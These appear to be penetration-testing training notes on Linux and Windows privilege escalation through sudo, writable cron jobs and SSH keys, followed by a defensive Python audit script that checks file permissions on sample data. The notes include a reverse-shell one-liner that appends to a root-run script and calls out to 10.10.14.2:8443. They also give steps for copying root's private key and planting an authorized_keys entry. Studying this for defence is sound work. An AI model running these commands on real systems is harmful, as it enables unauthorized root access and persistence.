Privilege Escalation
Table of Contents
- Clear-text Credentials: cleartext passwords in files
- User Privileges: user is given privileges in files or commands
- sudo: user given sudo privileges in certain applications/commands
- Scheduled Tasks: user is given write access to scheduled tasks; write reverse shell in script
- Kernel Exploits: exploit outdated and unpatched system
- Vulnerable Software: exploit outdated or vulnerable software on the system
Clear-text Credentials
See the Linux Credential Hunting and Windows Credential Hunting notes.
User Privileges
Check the privileges available to the user we have access to. Suppose we are allowed to run specific commands as root (or as another user). In that case, we may be able to escalate our privileges to the root/system user or gain access as a different user. Below are some common ways to exploit certain user privileges:
- Sudo
- SUID
- Windows Token Privileges
sudo
Check what sudo privileges we have with the sudo -l command:
> sudo -l
[sudo] password for user1:
...SNIP...
User user1 may run the following commands on ExampleServer:
(ALL : ALL) ALL
If the sudo privilege is granted for a specific user rather than for root, we can run sudo as that user and not as root. To do so, we specify the user with -u user:
> sudo -u user /bin/echo Hello World!
Hello World!
Once we find a particular application we can run with sudo, we can look for ways to exploit it to get a shell as the root user. GTFOBins contains a list of commands and how they can be exploited through sudo. We can search for the application we have sudo privilege over, and if it exists, it may tell us the exact command we should execute to gain root access using the sudo privilege we have.
LOLBAS also contains a list of Windows applications which we may be able to leverage to perform certain functions, like downloading files or executing commands in the context of a privileged user.
For example, suppose we have a file called monitor.sh that we, as a regular user, can execute with root privileges (found via sudo -l or LinEnum.sh). We can append a malicious command to the end of that file to generate a bash shell for us as root:
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 8443 >/tmp/f' | tee -a monitor.sh
Scheduled Tasks
In both Linux and Windows, there are methods to have scripts run at specific intervals to carry out a task. Some examples are having an anti-virus scan running every hour or a backup script that runs every 30 minutes. There are usually two ways to take advantage of scheduled tasks (Windows) or cron jobs (Linux) to escalate our privileges:
- Add new scheduled tasks/cron jobs
- Trick them into executing malicious software
The easiest way is to check if we are allowed to add new scheduled tasks. In Linux, a common form of maintaining scheduled tasks is through Cron Jobs. There are specific directories that we may be able to utilize to add new cron jobs if we have write permissions over them. These include:
/etc/crontab
/etc/cron.d
/var/spool/cron/crontabs/root
If we can write to a directory called by a cron job, we can write a bash script with a reverse shell command, which should send us a reverse shell when executed.
SSH Keys
Finally, let us discuss SSH keys. If we have read access over the .ssh directory for a specific user, we may read their private ssh keys found in /home/user/.ssh/id_rsa or /root/.ssh/id_rsa, and use them to log in to the server. If we can read the /root/.ssh/ directory and can read the id_rsa file, we can copy it to our machine and use the -i flag to log in with it:
> vim id_rsa
> chmod 600 id_rsa
> ssh root@10.10.10.10 -i id_rsa
root@10.10.10.10#
If we find ourselves with write access to a user's .ssh/ directory, we can place our public key in the user's ssh directory at /home/user/.ssh/authorized_keys. This technique is usually used to gain ssh access after gaining a shell as that user. The current SSH configuration will not accept keys written by other users, so it will only work if we have already gained control over that user. We must first create a new key with ssh-keygen and the -f flag to specify the output file:
> ssh-keygen -f key
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase): *******
Enter same passphrase again: *******
Your identification has been saved in key
Your public key has been saved in key.pub
The key fingerprint is:
SHA256:...SNIP... user@parrot
The key's randomart image is:
+---[RSA 3072]----+
| ..o.++.+ |
...SNIP...
| . ..oo+. |
+----[SHA256]-----+
This will give us two files: key (which we will use with ssh -i) and key.pub, which we will copy to the remote machine. Let us copy key.pub, then on the remote machine, we will add it into /root/.ssh/authorized_keys:
user@remotehost$ echo "ssh-rsa AAAAB...SNIP...M= user@parrot" >> /root/.ssh/authorized_keys
Now, the remote server should allow us to log in as that user by using our private key:
> ssh root@10.10.10.10 -i key
root@remotehost#
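As an added example (not part of the original notes), the following Python script checks, from the defender's side, the conditions that the monitor.sh, cron and SSH-key sections above rely on: it parses system-crontab entries (the /etc/crontab and /etc/cron.d format, which carries a user field; per-user crontabs under /var/spool/cron/crontabs have none and are not parsed here), then flags cron targets and directories that are group- or world-writable and private keys that are readable by others. The crontab text and file modes are constructed sample data; on a real host, call audit() on the paths without mode_of so it uses os.stat.

```python
import os
import re
import stat
# /etc/crontab and /etc/cron.d/* entries: five time fields (or an @special), a user, then the command.
SYSTEM_CRON_RE = re.compile(r"^\s*(?:@\S+|(?:\S+\s+){4}\S+)\s+(?P<user>\S+)\s+(?P<cmd>.+)$")
def cron_script_paths(crontab_text):
    """Return absolute program paths referenced by system-crontab entries."""
    paths = []
    for line in crontab_text.splitlines():
        tokens = line.split()
        if not tokens or tokens[0].startswith("#") or "=" in tokens[0]:
            continue  # blank line, comment, or environment assignment (SHELL=, PATH=)
        m = SYSTEM_CRON_RE.match(line)
        cmd = m.group("cmd").split() if m else []
        if cmd and cmd[0].startswith("/"):
            paths.append(cmd[0])
    return paths
def mode_findings(path, mode):
    """Flag permission bits that let non-owners tamper with, or read, a sensitive file."""
    findings = []
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(f"{path}: writable by group/others ({stat.filemode(mode)})")
    if path.endswith("id_rsa") and mode & (stat.S_IRGRP | stat.S_IROTH):
        findings.append(f"{path}: private key readable by group/others ({stat.filemode(mode)})")
    return findings
def audit(paths, mode_of=lambda p: os.stat(p).st_mode):
    """Check each path; mode_of defaults to a real os.stat and is injectable for offline runs."""
    out = []
    for p in paths:
        try:
            out.extend(mode_findings(p, mode_of(p)))
        except (FileNotFoundError, PermissionError, KeyError):
            continue  # path absent (or unreadable) on this host
    return out
# Constructed sample (not from a real host): a crontab plus the modes of the files involved.
SAMPLE_CRONTAB = """SHELL=/bin/sh
# m h dom mon dow user command
*/30 * * * * root /usr/local/bin/monitor.sh --quiet
@reboot root /opt/backup.sh
"""
SAMPLE_MODES = {
    "/usr/local/bin/monitor.sh": 0o100777,        # world-writable script run by root
    "/opt/backup.sh": 0o100755,                   # fine: only the owner can write
    "/etc/cron.d": 0o040775,                      # group-writable cron directory
    "/home/user/.ssh/id_rsa": 0o100644,           # private key readable by everyone
    "/home/user/.ssh/authorized_keys": 0o100644,  # fine: not writable by others
}
def demo():
    targets = cron_script_paths(SAMPLE_CRONTAB) + ["/etc/cron.d"] + [p for p in SAMPLE_MODES if "/.ssh/" in p]
    return audit(targets, mode_of=SAMPLE_MODES.__getitem__)
```

demo() returns three findings for the sample: the world-writable monitor.sh, the group-writable /etc/cron.d, and the readable id_rsa; backup.sh and authorized_keys pass.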
Kernel Exploits
If the target runs an old operating system, look for potential kernel vulnerabilities that may exist in unpatched versions of Linux and Windows.
Vulnerable Software
Use the dpkg -l command on Linux or look at C:\Program Files in Windows to see what software is installed on the system, then look for public exploits for any installed software, especially if older versions containing unpatched vulnerabilities are in use.